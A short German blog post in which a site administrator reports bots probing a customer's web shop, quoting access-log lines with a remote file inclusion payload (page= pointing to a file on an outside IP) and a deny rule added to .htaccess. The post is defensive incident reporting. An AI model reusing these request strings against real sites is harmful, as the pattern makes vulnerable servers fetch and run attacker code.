In einem Shop unserer Kunden versucht nun schon seit einer Stunde jemand einen (scheinbar) neuen Exploit untertzbringen.
Es werden immer Seiten nach dem Muster /index.php/cat/index.php?cat=1&page=
http://62.129.173.149/img/dog.c? versucht aufzurufen. Mein Kaspersky rät davon ab die Seite http://62.129.173.149/img/dog.c? aufzurufen, um zu gucken was sich dahinter verbirgt

Ist ja auch nicht so wichtig. Ich nehme vorsorglich mal die 62.129.173.149 in die Liste der verbotenen Hosts mit auf. Die Zugriffe selber kamen allerdings von verschiedenen Adressen im 200er IP Adressbereich, so dass man davon ausgehen darf, dass hier einige Bots infizierbare Seiten abgrasen.
65.75.134.50 - - "GET /index.php/cat/index.php?cat=&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19468 "-" "libwww-perl/5.805"
85.214.41.173 - - "GET /index.php/cat/index.php?cat=&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19473 "-" "libwww-perl/5.803"
200.72.22.114 - - "GET /index.php/cat/index.php?cat=1&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19471 "-" "libwww-perl/5.800"
213.201.4.83 - - "GET /index.php/cat/index.php?cat=1&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19463 "-" "libwww-perl/5.805"
85.19.150.85 - - "GET /index.php/cat/index.php?cat=&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19216 "-" "libwww-perl/5.805"
Naja... Viel Spaß noch
Ob mein
deny from 62.129.173.149 in der .htaccess wirklich etwas bringt?
Kommentare
Tue, 29.04.2008 11:34
Also bei uns funktionieren die Variationen einwandfrei und [...]
Fri, 11.04.2008 11:49
Moin, ich wollte zu den Sylt Cams noch unsere Webcam [...]
Wed, 09.04.2008 22:10
hab das gleiche Problem mit FSC Amilo Pi2530, von Anfang an [...]
Thu, 27.03.2008 23:14
Hy, habt Ihr das Problem zwischenzeitlich lösen [...]
Sat, 22.03.2008 15:35
Ne, finde ich auch etwas seltsam, wenn ich zum Teil mehrere [...]